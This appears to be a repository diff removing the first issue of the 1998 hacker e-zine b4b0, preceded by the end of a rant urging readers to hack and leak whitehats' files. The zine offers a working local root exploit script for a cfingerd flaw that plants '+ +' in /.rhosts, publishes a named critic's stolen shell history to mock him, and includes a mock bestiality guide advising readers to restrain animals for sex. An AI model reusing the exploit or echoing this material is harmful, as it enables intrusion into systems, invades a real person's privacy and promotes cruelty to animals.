discovered the "fact" that InfoSec Sellout was LMH and was backed by PHC, it
caused quite a stir for those that remembered the heyday of the pr0j3kt. For
the whitehats that had just entered the industry post-whitehat holocaust, it
didn't mean a thing. They simply assumed (like 90% of the HTS userbase) that
PHC was/is a group of dissatisfied script kiddies. Too bad all the evidence
points to the contrary. Another sad fact is that whitehats have not only
taken over the public side of the scene, but the private side as well. These
"revelations" about InfoSec Sellout at one time would have come from an
anonymous post to FD, from a member of the underground. Now they come from a
"respected security professional". Instead of talking about the activities of
real hackers, the gossip reels these days deal with the exploits of whitehats
like David Maynor, HD Moore and others. Is this what we've allowed the scene to
become? A bunch of idlers thinking about fat middle aged whitehats? Where's the
rage? Where's the dedication to the eradication of the greedy security
consultants? Where's all the activity that was prevalent in the scene until
recently?
A time has come for a change. Follow the example dikline set out. Take back the
scene! Go out and actually hack. Don't post exploits to FD; post a whitehat's
spools! Continue the legacy of the glorious pr0j3kt m4yh3m!
Never sell out, never surrender.
EOSCENE
);}

996
b4b0/b4b0-01.txt
View file

@ -1,996 +0,0 @@
- -[ (c) 1998 the b4b0 party programme ]- -
.`'`'`,: .'`'`'`.' .`'``: .'`'`'`':
.' .` .' .' .' .':.' .':
d$$$$' .$$$$$$$$. d$$$$` .$$$$$$$$. : +-+-+-+-+
$$$$' $$$$ $$$$ $$$$' $$$$ $$$$ : |b|4|b|0|
d$$$. $$$$ $$$$ $$$$. $$$$ $$$$ : +-+-+-+-+
$$$$$b, ``~$ss$$$$ $$$$b. ``~$ $$$$ : [ the resurrection of vice ]
$$$$$$$$$$$b.`$$$$ $$$$$$$$$b. $$$$ : [ w00pie! ]
$$$$$$$$$$$$$ $$$$ $$$$$$$$$$$ $$$$ : [ over 1 billion served ]
$$$$$ $$$$$ $$$$ $$$$$ $$$ $$$$ .
$$$$$$ss$$$$' $$$$ $$$$$$ss$$$ $$$$ :
$$$$ $$$$$'s$ $$$`s$$$$ $$$$$'s$$$$'.':
[ making life a bit more special ]/`
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
........[ issue # 001 ]
: :
[ ]=[ 1 ] you guessed it, an introduction.
: :
[ ]=[ 2 ] total bullshit (a.k.a. gripez, complaintz, and thee alike)
: :
[ ]=[ 3 ] journey in the enchanted forest!
: :
[ ]=[ 4 ] deedles "yo mama" jokez (not a b4b0 sponsered product but we
: : put it in anyways due to lack of taste)
[ ]=[ 5 ] SIFAORT (sexuality in farm animals and other related thingz)
: :
[ ]=[ 6 ] b4b0 adventurez elite
: :
[ ]=[ 7 ] defcon review by tEEp
: :
[ ]=[ 8 ] fin
:.:...
.->[ the b4b0 st4ff ]<-.
| |
V $
[*] official keeper of all things that are small
+ ge0rge the elite gerbil
[x] organizer of all things that are in cgi-bin
+ phFh4ck3r
[o] gardener of the b4b0 drug fields in Bogota, Columbia
+ r4lph m4lph
[+] the one with the funk flow
+ thE MiLk
[z] tamer of wild amphibious goats wearing thong bikinis
+ seegn4l
[%] pr0n archiver and mystical sheep herder
+ l0hrdz
[i] an enigma in a camels hump
+ ezzreallahteh
[+] pecker of eyes and burgl0r of turdz
+ tEEp
[!] eater of w0rlds and the enlarger of anus
+ dehp0ozy
[@] seller of smack and things dipped in honey
+ gR3-0p
V $
| |
`->[ end of b4b0 staff ]-'
.,.,.,.,.,.
;shoutoutz;
`'`'`'`'`'`
any and every person who gets laid in the oval office, good looking irc
chicks (if any), our moms (hi mom!), the beastie boyz, the dalilama (y0
h0wz india?) plumbers (say 'no' to crack), chiXy and the rest of you UDDF
idiots, Timothy Leary (thankz again), african americans, Allah, all women
who get on confs, because we at b4b0 recognize that every horny fuck
(which includes ourselves) on the conf seems to try to get phone sex from
you we thank you for putting up w/our hormones.
-[ fuck yous ]-
any domain with the word 'hack' in it, people who buy the "for dummies"
book series, packet warriorz, narkz, dalnet, undernets #hackphreak
(which technically is a #teen channel on dalnet), congressmen and women,
antionline.com, ircmostwanted.org, and any other fucking queer domainz,
all people who grep for 'cut here' in text files, and lastly, kenneth
starr (drop yur investigation, b. clinton iz a straight pimp. dont
disrespekt).
- b4b0's international drink : vodka w/a slice of lemon
- b4b0's official enemies : Coolio, the chinese government
(free tibet you fucking bastards)
- b4b0's official spokesman : THE F0NZ
- b4b0's international house of pancakes outpost : Outpost #152,
Berlin, Germany
- Official enforcer of b4b0's will and wayz : Ross Perot's goons (word!)
- b4b0's song(s) of work and joy : zoot suit riot (cherry poppin' daddies)
intergalactic planetary (beastie boys)
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
.x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x
| editorz intr0 |
`x- -x- -x- -x-/'
hi. i am your editor, ge0rge, here to protect and serve, and yes, b4b0 iz
good to the last drop. Bringing you probably the most el8 shit around,
b4b0 is here, possibly forever (or till one of us gets sober). We only
have one policy here, and thats 'its not our fucking fault you did
something because of this publication, dumb shits.' take this policy to
heart. aside from that, this zine ought to fucking own because we have
alcohol, porn, and a pack of condemz.. so i estimate, overall, this ought
to be an enjoyable experience for not only me, but you too (yes YOU!).
Anyways, have a nice day and remember, only you can prevent forest fires.
.ge0rge - the almighty edit0r
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x
- -[1] thats right, an introduction the the b4b0 zine. ]- -
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
*b4b0 -[ pronounced ] " bah' boh "
*b4b0 -[ known origins ] first created in american laboratories in 1944 to
defeat the nazi super power, but soon after war
ended, it became a very valuable janitorial
cleaning substance.
*b4b0 -[ monthly slogan(s) ]
b4b0: good to the last drop!
b4b0: here to protect and serve.
b4b0: come to where the flavor is
b4b0: the next generation of wheaties champions
*b4b0 -[ warnings ]
SURGEON GENERAL'S WARNING: Quitting b4b0 Now Greatly Reduces Serious
Risks To Your Health
SURGEON GENERAL'S WARNING: b4b0 Read By Pregnant Women May Result In
Fetal Injury, Premature Birth, and Low Birth Weight.
WARNING: THIS PRODUCT MAY CAUSE GUM DISEASE AND TOOTH LOSS
BY READING THIS PRODUCT YOU CONSENT TO READING AN 'AS IS' PRODUCT. NO
GUARENTEES OF THIS PRODUCT ARE PROVIDED.
*b4b0 -[ other ]
3. JANITORIAL SUPPLIES
[URL: www.hiline.net/~alayton/97-93.htm]
JANITORIAL SUPPLIES - Edinburg CISD. 5/97 THRU 12/97 For
Further Information contact Dina Escamilla, Purchasing
Department, at 956-316-7200, ext. 222 or...
Last modified 20-Aug-97 - page size 17K - in English [
Translate ]
485-20-36040-4 650 BID 97-93 12.21/CASE
CHLORINATED CLEANSING POWDER, ABRASIVE TYPE
SCOURING CLEANER, 24/21 OZ. PER CASE, BAB-O,
06906-2421
$ man b4b0
B4B0(1) UNIX Drunken Admin Guide B4B0(1)
NAME
b4b0 - b4b0 zine / cleaner.
SYNOPSIS
b4b0 - No information available due to lack of sobriety.
DESCRIPTION
b4b0 is two things, which makes them especialy dangerous to your system
but very fun if you enjoy things such as alcohol, intake, and intake of
alcohol. If taken in large amounts, it can cause serious risks to your
health.
FILES
/etc/b4b0
SEE ALSO
DRUGS, DRUG USAGE, shutdown(8), death(1), k-radfuqneliteness(2)
AUTHOR
Original author(s) of b4b0 are still on the run from authorities. If
spotted, contact your local federal law enforcement agencies.
:q
$ whatis b4b0
b4b0: nothing appropriate
line 1/1 (END)
$ whereis b4b0
b4b0: /b4b0 /usr/man/b4b0.1 /bin/b4b0 /usr/bin/b4b0 /usr/pr0n/b4b0
$
** irc smack **
<ge0rge> so what do you guys think of b4b0! the el8est shit out there!
<hb0mb> b4b0?
<ge0rge> yeah b4b0!
<jd> i dont have it!
[hb0mb(hydrogen_b@cx51441-a.lncln1.ri.home.com)] what is b4b0?
<jd> but i hear its neet!
<ge0rge> some would say that b4b0 is eliter than viagra
<ge0rge> would you agreE?!
<jsbach_> hahah
<jd> it gets me hard
<jd> just thinkin about it
<ge0rge> if b4b0 was a small animal, what would you do with it?
<jd> give it to rloxely for him to have seckz with
<ge0rge> if b4b0 was a drug, which bodily orfice would you put it in?
<hb0mb> I think i'll be leaving now...
** session 2 **
<ge0rge> what do you think about b4b0!
<ge0rge> ?
<sewid> whos that?
<ge0rge> you know, b4b0!
<sewid> nope =(
<ge0rge> c0me on, you know, b4b0!
<sewid> well
<sewid> No I dont.
<su1d> I DO!!!!!!!!
<ge0rge> Ok, well if you did, would you give oral sex to members of b4b0
or b4b0 and thee alike?
!b4b0-IRC-qu0tez!
1 <broken-> t34m b4b0 0wnz
2 <broken-> 1 l0v3 t34m b4b0
3 <qdial> t34m b4b0 0wnz j00 br0k3n~
4 <broken-> t34m b4b0 ownz d4 w0rld
5 <tip> b4b0 0wns j00
6 >>> broken- has changed the topic on channel #2600 to: b0w t0 b4b0!
7 Topic for #hack: b4b0: quilted soft, not like those flat-as-a-pancake
paper towells
- -[2] some idiot named JP [a total bullshit profile] ]- -
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Media whores.
Publicity is the name of the game. I just had to add
JP@antionline.com in this section because what he does is total bullshit.
He gives publicity to people who change html on sites, gives fame to those
who crack senstitive sites, but yet disapproves of the 'evil cracker.'
JP, as you probably know, runs that loser script kiddie site known
as www.antionline.com. It is funny however, how he preaches on the matter
of computer security, yet knows nothing of the sort other than what he
seen off a movie (we won't say which, you figure it out). But, the most
contraversial thing is how on one side he talks about how stopping the
evil cracker, but yet on his site, he releases full source to "exploits"
which give any idiot with compilation knowledge the ability to gain
unauthorized access / unauthorized priveledges to a system. Sure sure,
i'll agree that security through obscurity is futile, but security through
distribution of full source code to every idiot on the planet sure isn't
security. Oh, but wait, exploits are what get the hits right?
To prove b4b0z point, here iz some docz.
- -[ START JP WAREZ ]- -
- -[ thankz to whomever for providing JP's history file. ]- -
/* jp bash_history - commented by _mind with a little help from floydy */
/* i've noticed that his ~ is not world executable any more */
pine
ls
cd public_html
ls
cd .. /* ls public_html/ is too hard */
ls
cd Yakko
ls
pine
ls
cd ..
ls
pine
fs
./fs
fs -lq
ls
cd mbox /* ENOTDIR */
cd mail
ls
cd sent-mail
rm sent-mail
cd ..
ls
rm pine.core
pine
mail
ls
cd /var/mail/jp /* ENOTDIR, not EAGAIN */
cat /var/mail/jp |more
pico /var/mail/jp |more /* ncurses doesn't handle pipes too well */
cat usr/var/jp /* i'm competent, really */
pine
cat /usr/var/mail/jp
cat /var/mail/jp
touch /var/mail/jp
cat /var/mail/jp
ls
rm /var/mail/jp
touch jp
mv jp /var/mail/jp /* apparently touch only works in the pwd */
rm jp /* who did (cd /bin;ln -sf cp mv) ? */
cat /var/mail/jp
pine
cat /var/mail/jp
del
rm /var/mail/jp
./eggdrop Yakko /* i could program my own bot if i knew how! */
pwd /* some day, ill learn how to set my prompt */
cd Yakko
./eggdrop Yakko
./eggdrop wakko /* doh, unix IS case sensitive */
./eggdrop Wakko
./eggdrop Dot
./eggdrop Dot
./eggdrop Wakko
./eggdrop Yakko
./eggdrop Wakko /* fault tolerant eggdrops ... i am so good */
./eggdrop Dot
cd Yakko
./eggdrop Yakko
./eggdrop Wakko
./eggdrop Dot
cd Yakko
./eggdrop Yakko
./eggdrop dot
./eggdrop Wakko
./eggdrop Dot
ls
pine
perl winnuke.pl /* im eleet */
pico /var/usr/jp
cat /var/usr/jp
pico usr/var/jp /* pico is easier than vi */
pine
pico /var/mail/jp
pico /var/mail/jp
pico /var/mail/jp
pico /var/mail/jp
pico /var/mail/jp
pico /var/mail/jp
pico /var/mail/jp
pico
pine
cd Yakko
cd Yakko
./eggdrop Wakko
ssh cyclone.lazerlink.net /* telnet over the internet into a ssh */
ssh cyclone.lazerlink.net /* over a lan helps security a lot */
ssh cyclone.lazerlink.net
cd Yakko
./eggdrop Dot
cd Yakko
./eggdrop wakko
./eggdrop Wakko
./eggdrop Yakko
./eggdrop wakko
./eggdrop Wakko
./eggdrop dot
./eggdrop Dot
cd Yakko
./eggdrop Wakko
./eggdrop Wakko
cd Yakko
./eggdrop Wakko
./eggdrop Yakko
./eggdrop Wakko
./eggdrop Dot
ps
cd Yakko
./eggdrop Wakko
man bitchx /* hey, this looks better than mirc */
domain /* people will respect me because of my domain
*/
bitchx -h
bitchx -h shell.antionline.net /* especially with this great domain */
./bitchx -H shell.antionline.net
bitchx
/ /* trying to run / again. tsk tsk tsk */
clear /* i'm going to delete your hard drive */
bitchx -H shell.antionline.net
clear
ps
ps
kill -9 19487 /* time to take out some agression */
kill -9 19496
kill -9 19632
./eggdrop Yakko
cd Yakko
./eggdrop Yakko
./eggdrop Wakko
./eggdrop Dot
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
telnet cyclone.lazerlink.net
pine
y /* why not ? */
pine
pine
pin3e /* aww, bash doesn't interpret 3l33tsp33k */
pine
pine
pine
pine
pine
pine
pine
telnet cyclone.lazerlink.net /* ugh, i've got to enter my password with */
ssh cyclone.lazerlink.net /* telnet, let's not use it in the future */
pine
pine
pine
pine
pine
pine
pine
whois http://neworder.box.sk/cgi-bin/marek/box/box?act=2&prj=neworder&gfx=newor
der&srch=antionline&fil=*&lan=e
/* i'm smart */
whois narber.net
whois narber.com
ssh cyclone.lazerlink.net /* yay for domain search order */
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
cd Yakko
./eggdrop Yakko
./eggdrop Wakko
./eggdrop Dot
whois newjackcity
whois netjackcity.net /* maybe this is a new kiddie porn site */
ssh cyclone.lazerlink.net
ssh Cyclone.lazerlink.net
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
cd com/jpaccesswatch
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net?
ssh cyclone.lazerlink.net
cd Yakko
./eggdrop Yakko
./eggdrop Wakko
./eggdrop Dot
ssh cyclone.lazerlink.net
cd Yakko
./eggdrop Wakko
cd Yakko
./eggdrop Dot
ssh cyclone.lazerlink.net
ssh cyclone.lazerlink.net
telnet cyclone.lazerlink.net
ssh cyclone.lazerlink.net
ssh www.antionline.com
ssh www.antionline.com
ps
cd Yakko
cd P
ls
cd passwords4web/ /* it's a good idea to store your */
cat Vertig0 /* passwords on other systems in plaintext */
cat vertig0 /* i have a good memory */
cat Vertigo
ls
ls V*
cat Vertig0.txt
ssh cyclone.lazerlink.net
ssh www.antionline.com
ssh www.antionline.com
ps
ssh cyclone.lazerlink.net
ssh www.antionline.com
ssh shell.antionline.net
ssh www.antionline.com
ssh www.antionline.com
ssh www.antionline.com
ssh cyclone.lazerlink.net
ssh www.antionline.com
ssh www.antionline.com
ssh www.antionline.com
ssh www.antionline.com
ssh cyclone.lazerlink.net
ssh www.antionline.com
ssh www.antionlien.com
ssh www.antionline.com
ssh www.antionline.com
ssh www.antionline.com
ssh cyclone.lazerlink.net
ssh www.antionline.com
ssh www.antionline.com
telnet www.antionline.com
ssh www.antionline.com
ssh www.antionline.net
ssh www.antionline.com
ssh www.antionline.com
ssh www.antionline.com
ssh www.antionline.com
ssh www.antionline.com
cd com/jpaccesswatch /* ugh, where did i put 0day windows98? */
ssh www.antionline.com
pine
pine
pine
who
ssh www.antionline.com
cd Yakko
./eggdrop Yakko
ps
kill -9 7928
pine
pine
clear /* uh oh, mom is coming down the hall */
who
ps
logout /* time to get dressed and go to school */
ssh www.antionline.com
./bitchx -h antionline.net
bitchx
bitchx -H shell.antionline.net
ls
ls -a
cat .BitchX
cat .BitchX
/clear /* since when are commands stored there? */
clear
ls -a
bitchx -h
bitchx -H shell.antionline.net
ls
who\ /* i feel like i'm in dos or something */
who
bitchx -H shell.antionline.net
bitchx -H shell.antionline.net
pine
cd Yakko
./eggdrop Yakko
bitchx -H shell.antionline.net /* bitchx r00lz */
ps
kill -9 13616
cd Yakko
./eggdrop Yakko
ps
kill -9 3911
cd Yakko
./eggdrop Yakko
ps
kill -9 2746
cd Yakko
./eggdrop Yakko
ps
kill -9 20207
ls
cd Yakko
./eggdrop Yakko
cd Yakko
./eggdrop Wakko
crontab -e
w
top
exit
clear
host -l itsi.disa.mil /* hey, i learned a new command */
host -l disa.mil
host -l antionline.com
nslookup storm.disa.mil /* ditto */
host -l itsi.disa.mil
nslookup whitehouse.gov
nlsookup 198.137.241.1
nslookup 198.137.241.1 /* look, i'm hacking government sites */
whois eop.gov
nslookup 198.137.241.52 /* i hope i do not get caught stealing this */
nslookup 198.137.241.50 /* sensitive information */
nslookup 198.137.242.1
nslookup disa.mil /* i'm being like the MOD */
nslookup www.disa.mil /* i'm glad i've got a lazerlink account */
whois shellz.net /* because windows can't do this */
- -[ END JP WAREZ. ]- -
"UNIX For Dummies" hasn't helped out much there JP.
This Week's MailBag
Wednesday 4:15am, July 22, 1998
It's late, but it's here. Our weekly
mailbag gives you the opportunity
to ask questions, and make comments.
See what other people are saying
about current security issues.
It says "gives you the opportunity to ask questions, and make comments"
but yet all the mail b4b0 has sent in has not been in the 'mailbag.' But
then again, what doesn't approve of antionline.com doesn't go up now does
it? Censorship is bad he says, but yet he censors the mail.
funny isn't it.
-[3] enchanted forest]- -
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
while walking through the enchanted forest you find ....
-*> ZERO DAY KODEZ!@#$ <*-
n0Rmally, Such gay_juarez w0uld n0t b3 rele4seD -H0WEVER seeing az
this iz the first issue 0f b4b0!(tm) we are legally 0bliged to pr0vide
s0me sort of script for the needz of idiotz like so1o. s0 enjoy!
(PS: IF YOU REALLY NEED THIS SCRIPT YOU HAVE SERIOUS ISSUES TO DEAL WITH)
#!/bin/sh
# T E 4 M B 4 B 0 (tm)
# specify what you need. if you can't do
# the cfingerd vulnerability to put + + rhosts.
# have fun !
#
# b4b0!
CC=/FILL/THIS/SHMACK/IN/YOU/FUCKING/IDIOT
FILE=THISTOOMORON
echo "increasing your script kiddie career times 4!"
echo "w0rd to b4b0! h0h0h0"
echo "b4b0 developementz (c) 1998 [you rip, we castrate]"
cat <<_b4b0_> tmp.c
#include <stdio.h>
int main(void)
{
setreuid(0, 0);
system("/bin/echo + + > /.rhosts");
}
_b4b0_
$CC tmp.c -o $FILE
rm -rf tmp.c
echo '$exec '$PWD/$FILE > ~/.project
echo "fingering for a better tomorrow.."
finger `whoami`@127.0.0.1 2&> /dev/null
echo "done (-hopefully-)"
echo "have fun -b4b0!"
# rsh 127.0.0.1 -l root /bin/sh -i
# shm4ck!
--STOP CUTTING YOU FUCKING IDIOT--
you thank the gods of b4b0, and continue your journey into the enchanted
forest..
-[4] y0 mama jokez by deedle! (erm, dont ask)]- -
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Yo mama's so old when i told her to act her age, the bitch droped dead!
Yo mama has 1 eye and 1 leg and works at IHOP
Yo mama's like a toyota O WHAT A FEELING!
Yo mama's arm pitts are so hairy it looks like she has don king in a head
lock.
Yo mama's so stupid she got fired from the m&m company for throwing away
W's. h0h0h0
Yo mama's so fat when she broke her leg gravy started to poor out.
Yo mama's so fat her blood type is rocky road with double fudge.
Yo mama's so fat she uses the vcr as a pager.
Yo mama's ass is so big she's taller sitting down!
Yo mama's so old she coughz mummy dust
Yo mama's so old she has jesus's phone #
Yo mama's so stupid she thought a quarter back was a refund
Yo mama's legs are so hairy when you were born the doctors had to take you
to the emergency room for 3rd degree rugburn
Yo mama's pussy's so dry the crabs carry cantines.
Have you ever heard of the old woman who lived in a shoe?
Well yo mama's so poor she lived in a flip flop!
Yo mama's so fat she uses the interstate as a slip and slide.
- -[5] SIFORT : Sexuality In Farm Animals and Other Related Things ]- -
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
This is the first b4b0 sponsered "Sexuality In Farm Animals and Other
Related Things" ( SIFAORT ) by the b4b0 staff. We have made a rating
system. observe.
-5 -4 -3 -2 -1 0 1 2 3 4 5 6 7 8 9 10
| | | | | | | | | | | | | | | |
[ SEE BELOW ] [ BAD ] [ OK ] [ DAMN GOOD ]
|
if the rating is
within these numbers
it is recommended that
you D0 N0T stick yur wang
in that shit.
Use this rating scale while reading this compact article of the SIFAORT.
Thankz.
--
.sssssssssssss.
.dS$$$$$$$$$$$$$$$b.
d$$$"` `"$$$b NOTE: THIS PICTURE DOES NOT INCLUDE
$$$ __ $$$ TAIL. ANOTHER DIFFICULTY.
`$$$ [__] $$$'
`~$SS $$ SS$~'
$$ $$ $$
$ $ $
: : :
: : :
#1 HORSE:
difficulty : expert
risk : tons
pleasure : 10 on b4b0 scale.
background : screwing horses, started off as an amish tradition. Seeing
how amish people have more strength than normal human beings
and that horses can't talk (cept for mister ed), the horse
was / is the best source of sin / pleasure for the amish
people. Due to the horse waking up and getting pissed off
because your penis is in its anus and kicking you in your
chest w/5000 pounds of force, this type of pleasure is for
experts ONLY. novices, stick to lower farm animals and
house hold pets.
--
.ssssssssssssssss.
.dS$$$$$$$$$$$$$$$$$$Sb.
$$$$P~'` `'~Z$$$$ NOTE: THIS PICTURE TAKEN BY NASA
`$$' `$$' SATELLITES. MACHINE CRACKED
`$. __ .$' BY EL8 H1J4CK1NG SK1LLS.
`$ (__) $'
$ $$ $
$ $ $
: : :
#2 CAROL MEINAL
difficulty : advanced
pleasure : -5
background : one word, sick. if you are willing to give this nasty
shit a go, check into a hospital, cuz you got problemz.
Carol Meinals anus first discovered by explorers of the
spanish inquisition. The natives called it "aboobajama",
meaning "thing who sucks in all" but the spanish called it
"anos de diablo." Be afraid, be very afraid.
--
.ssssss.
.sdSSSSSSSSSSbs. NOTE: tail not pictured.
$SS"` '"SS$
`$ [o] $'
`$ : $'
`$ . $'
#3 Your Neighbors cat.
difficulty : novice
pleasure : 7 (depending on how much you hate/want cat)
background : The cat has a lot of defenses against such rape attacks
i.e. claws, teath. It is highly recommended that the
cat is either knocked out or tied down securely. It is
a good tool for revenge, nothing scares the neighbors more
or pisses them off more than a cat with a humongous anus.
--
.d$$$b. NOTE: TAIL NOT PICTURED.
$$[.]$$
`:' `:'
#4 New York Street Rats
difficulty : novice
pleasure : 5
background : fierce, rabid, but very doable. Take caution because the rats
DO have claws and teeth, so like the cat, you must either
knock it out, or take the necessary precautions to do it
properly.
--
.d$$$$$$$$b.
$$' _ `$$
`$ (_) $'
`$ $ $'
$ : $
#5 Domestic Farm Pig. (also referred to as 'hog')
difficulty : beginner
pleasure : 6
background : The south is where you'll primarily see alot of this type
of sexual molestation. A good ride for the beginner, easy
source of pleasure because the pig does not fight back
hardly at all. No real warnings. Truly, the other white
meat.
Welp, that ends it for now, stay tuned for the next article, on "Sexuality
In Farm Animals and Other Related Things." Until next time!
-[6] super adventures of the b4b0 SUPER N1NJAZ ]- -
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!4b0!b4b0!b4b0!b4b0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!4b0!b4b0!b4b0!b4b0
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
0!b4b0!b4b0!b4b0!b4b0| b4b0z great adventure log |4b0!b4b0!b4b0!b4b0!b4b0!b4b
b4b0!b4b0!b4b0!b4b0!b| VOLUME I |b4b0!b4b0!b4b0!b4b0!b4b0!b4
b0!b4b0!b4b0!b4b0!b4b| |!b4b0!b4b0!b4b0!b4b0!b4b0!b
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!4b0!b4b0!b4b0!b4b0
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
Politicial and Marital Assassination
$ script shit_to_send_to_national_inquirer
Script started, file is shit_to_send_to_national_inquirer
$ telnet whitehouse.gov
Trying 198.137.241.30...
Connected to whitehouse.gov.
Escape character is '^]'.
# id /* fEAR! */
uid=0(root) gid=1 (system)
# grep clinton /etc/passwd
bclinton:x:100:10:Bill Clinton:/home/bclinton:/bin/sh
hclinton:x:101:10:Hillary Clinton:/home/hclinton:/bin/sh
# cd /home/bclinton
# ls -la
MONICA-1.GIF
JFLOWERS.JPG
LegalCourtDocuments.TXT
Evidence/
Legal/
Sex/
bin/
tools/
# ls -la | grep Sex
drwx------ 2 bclinton bclinton 32768 Jul 3 01:50 Sex/
# cd Sex
# ls -la
MONICA-001.GIF
MONICA-002.GIF
MONICA-003.GIF
MONICA-004.GIF
MONICA-069.GIF
MONICA-ONTABLE.GIF
Old/
# ls -la | grep Old
drwx------ 2 bclinton bclinton 32768 Jul 3 01:50 Old/
# cd Old
# ls -la
JFlower-01.JPG
JFlower-02.JPG
JFlower-03.JPG
JFlower-04.JPG
JFlower-05.JPG
JFlower-06.JPG
JFlower-07.JPG
JFlower-08.JPG
JFlower-09.JPG
JFlower-10.JPG
Case/
Documentation/
Consent/
# cd ..
# who
root tty1
narc tty2
kstarr tty3
hclinton tty4
# finger narc
Login name: narc In real life: ??????
Directory: /home/narc Shell: /bin/sh
Last login Wed Aug 7 02:03 on ttyp4 from 2600.com
No unread mail
No plan as of yet.
# whoami
root
# pwd
/home/bclinton
# cd ..
# su bclinton
#honey you aren't looking at
those nasty pictures again are you?
# /* HOLY SHIT IM CAUGHT */
# killall -9 -1
Connection Closed By Foreign Host
$ exit
exit
Script done, file is shit_to_send_to_national_inquirer
$
- -[7] Defcon 6.0 Review - tEEp]- -
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Over the course of five years, Defcon has become the largest, most
popular convention to go to. One chance to go and you'll see why;
not neccesarily the chance to see speakers or the chance to check out
product exhibitions; but the fact that it's a chance to meet up
with people, in of all places, Las Vegas.
105 degree weather, palm trees, and scantily clad women on taxi cab
ads were plainly in sight. Nudie "booklets" were available for free
in newspaper machines.
The Glitter Gulch stood prominently in the Freemont Experience.
It's a place that defines Las Vegas.
Women, alcohol, and gambling. Oh yeah, and Defcon.
Friday was registration ($40) and opening remarks by Dark Tangent.
Drinking and gambling in-between. A rather dull discussion on
lock picking by Gurney Halleck followed. DJs setup their equipment,
while the Capture the Flag network equipment fell into place.
What was an empty area suddenly became alive and busy.
No leet hackers were to been seen anywhere (guess they all came on
Saturday). All no-names and cluebies made the rounds everywhere. In
addition, everyone has resented the way hackers are dressed in the
movie, "Hackers." One look around, and you'll see it all over again.
Various desks popped up in the secondary room with people selling
Defcon/OpenBSD/cDc/etc clothing, CDs (FreeBSD/NetBSD/OpenBSD), used
hardware, books (amongst of which Carolyn "Clueless" Meinel's book
was seen), and even employment services.
The three girls selling the "Brute" DefCon T-shirt were very
babelicious. Go ahead and buy a T-shirt.
Hacker Jeopardy started; as people tested their knowledge, others
gambled and drank the night away... Hookers slept with a few haxx0rs
that night.
As Saturday came, the morning speeches were rather dull. The Hotel
Hacking discussion was rather interesting, however. Of course,
Ira had to go on his preachy rant about what takes "real technical
skills." Of course his speech was rather undetailed and not
very technical at all. Go figure.
The waitresses are hot at the Luxor Hotel. I highly recommend going there
to gamble. Talk about a high skirt with legs. Damn.
The Cult of the Dead Cow's intro/demo for Back Orifice was overpacked
and stuffy. Seems like every script kiddie needed a new tool to play
with. Wow, Windows can be cool again. Whutever. An interesting program;
however possibly overrated.
Of course as the afternoon waxed to night, people changed clothes to attend
the Black and White Ball. A guy wearing a towel, a guy in a bathrobe,
two guys in drag; what about the women? Since the male:female ratio was
practically 10:1, there's not much to talk about; other than the fact
there was a fat ass bitch who thought she was the shit, and the T-shirt
selling babes. Oh man, what a sight.
Sunday's theme was "missing in action." Many people left in the morning,
as well as Se7en not showing up for his speech. As people said their
goodbyes, everyone knew... next year, next year...
- -[ fin - edit0r ge0rge ]- -
